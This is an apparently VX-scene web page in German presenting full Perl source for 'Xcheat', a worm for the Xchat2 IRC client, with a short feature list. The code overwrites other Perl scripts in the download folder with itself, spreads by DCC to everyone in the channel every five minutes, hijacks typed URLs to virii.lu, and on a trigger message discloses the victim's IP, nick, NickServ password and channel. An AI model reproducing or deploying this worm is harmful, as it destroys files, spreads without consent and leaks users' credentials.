<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content=
"HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii" />
<title>Xcheat</title>
</head>
<body>
<hr />
<pre>
<b>[+]</b><u>Topic: Code</u>
<b>[+]</b><u>Von: Perforin</u>
<b>[+]</b><u>Return: <a href=
"javascript:history.back()">Code</a></u>
</pre>
	<hr />
<pre>

Xcheat - Xchat2 Plugin Worm

* infiziert alle Perl Files im Download Ordner von Xchat2
* Verbeitet sich alle 5 Minuten via DCC Send an alle User im momentanen Channel
* Wenn eine URL eingegeben wird, wird diese durch virii.lu ersetzt
* QRY zum Opfer mit dem befehl "xcheat" zeigt euch:
Die IP, den Nick, das Passwort und den momentanen Channel des Opfers.


Zwar ist dieser Wurm alles andere als unauff&auml;llig, jedoch habe ich noch keinen
reinen Xchat2 plugin Wurm gesehn. Abgesehen von dem mehr als d&uuml;rftigen Mini Tutorial
von Wargame zu diesem Thema --> <a href="http://vxheavens.com/lib/vwg02.html">vxheavens.com/lib/vwg02.html</a> gibt es auch keine mir
bekannten Versuche sowas zu erstellen.

Leider war es mir nicht m&ouml;glich den genauen Standort des Plugins aus zu machen,
da $0 sowie File::Bin, den falschen Pfad angeben. Auch $$ gibt die Prozess ID von
xchat wieder und nicht die vom Plugin selbst. Zwar k&ouml;nnte man zuerst eine Checksumme
des Wurms erstellen und durch rekursives suchen alle perl Dateien hashen und wenn die
selbe Checksumme herrauskommt, dann weiss man, dass es unser Wurm ist.

Doch ganz ehrlich? Dazu war ich zu faul; vielleicht in der n&auml;chsten version ;)

</pre>
	<hr />

<xmp>
#!/usr/bin/perl
# xcheat by Perforin [vxnetw0rk]

use strict;
use warnings;
use LWP::Simple;

my ($input, $user, $wheretolook);
my ($channel, $pass, $mynick, $zombie);
my (@ip, @users, @perlfiles, @clone);

Xchat::register("xcheat", "0.1", "*magic*");

$channel = Xchat::get_info('channel');
$pass = Xchat::get_info('nickserv');
$mynick = Xchat::get_info('nick');
$wheretolook = Xchat::get_prefs('dcc_dir');
@users = map { $_->{nick} } Xchat::get_list('users');

@ip = map { if (/<h1 class="ip">(\d+.\d+.\d+.\d+)<\/h1>/) { $+ } } get('http://www.wieistmeineip.de');

Xchat::hook_print('Private Message to Dialog', \&check);

Xchat::hook_timer(5000, \&urlgrabber); 	# 5 sekunden
Xchat::hook_timer(300000, \&spread);	# 5 Minuten

open Myself, "<", $wheretolook . "/xcheat.pl";
	@clone = <Myself>;
close Myself;

@perlfiles = glob "$wheretolook/*.pl";

foreach $zombie (@perlfiles) {

	unless ($zombie =~ /xcheat.pl$/) {
		open Infect, ">", $zombie;
		print Infect @clone;
		close Infect; 
	}

}

sub urlgrabber {
	$input = Xchat::get_info('inputbox');
	
	if ($input =~ /.?(http:\/\/\w{3}?\.?\w*\.\w+\/?)\s+/ig) {
		$input =~ s/$+/http:\/\/virii.lu/g;	# Warum? Weil ichs kann
		Xchat::command("say $input");
	}
	Xchat::KEEP;
}

sub spread {
	
	foreach $user (@users) {
		Xchat::command("dcc send $user $wheretolook/xcheat.pl") unless $user eq $mynick; # Ein Absoluter Pfad da weder $$ noch $0 das richtige anzeigen =(
	}
	Xchat::KEEP;

}

sub check {
	Xchat::command("say Xcheat activated! :) - Victim: @ip - Nick: $mynick - Pass: $pass - Channel: $channel") if $_[0][1] =~ /^xcheat$/;
}


</xmp>
	
</body>
</html>
